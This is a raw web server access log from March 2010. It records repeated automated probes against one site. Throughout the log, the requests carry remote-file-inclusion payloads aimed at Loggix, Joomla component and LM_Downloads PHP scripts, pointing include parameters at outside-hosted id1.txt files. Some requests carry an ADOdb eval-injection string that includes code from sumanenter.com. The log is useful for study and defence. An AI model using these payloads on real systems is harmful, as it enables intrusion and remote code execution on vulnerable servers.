67.227.136.138 - - [07/Mar/2010:09:46:10 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:10 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:10 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:51 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:11 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:11 -0800] "GET /logs/?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:12 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:12 -0800] "GET /logs/?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:12 -0800] "GET /?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:09:47:12 -0800] "GET /?sourcedir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:16 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:36 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:36 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:36 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:37 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:40 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:41 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:41 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:41 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:47:56 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:00 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:00 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:03 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:03 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:05 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:06 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:07 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:07 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:09 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:12 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:12 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:16 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:19 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:19 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:42 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:46 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:48:59 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:01 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:01 -0800] "GET /logs/access_100218.log//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:01 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:01 -0800] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:02 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:02 -0800] "GET /logs/access_100218.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:02 -0800] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:05 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:12 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:13 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:14 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:16 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:22 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:49:51 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:49:53 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:49:53 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:53 -0800] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:53 -0800] "GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:53 -0800] "GET /logs/access_100130.log%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:49:55 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:49:55 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:56 -0800] "GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:56 -0800] "GET /logs/access_100130.log%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:49:56 -0800] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:49:57 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:49:57 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:08 -0800] "GET /logs/access_100218.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:50:13 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:14 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:50:14 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:50:15 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:22 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:33 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:36 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:36 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:36 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:09:50:38 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:09:50:38 -0800] "GET /logs/access_100224.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:09:50:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:09:50:39 -0800] "GET /logs/access_100225.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:43 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:43 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:50:44 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:48 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:50 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:51 -0800] "GET /logs/access_100213.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:52 -0800] "GET /logs/access_100213.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:52 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:54 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:55 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:50:57 -0800] "GET /logs/access_100225.log%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:50:59 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:09:51:01 -0800] "GET /logs/access_100225.log%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:51:02 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:51:02 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:51:02 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:51:02 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:04 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:06 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:06 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:06 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:51:07 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:15 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:18 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:51:19 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:51:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:51:19 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:51:19 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:51:21 -0800] "GET /logs/access_100218.log//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:29 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:29 -0800] "GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
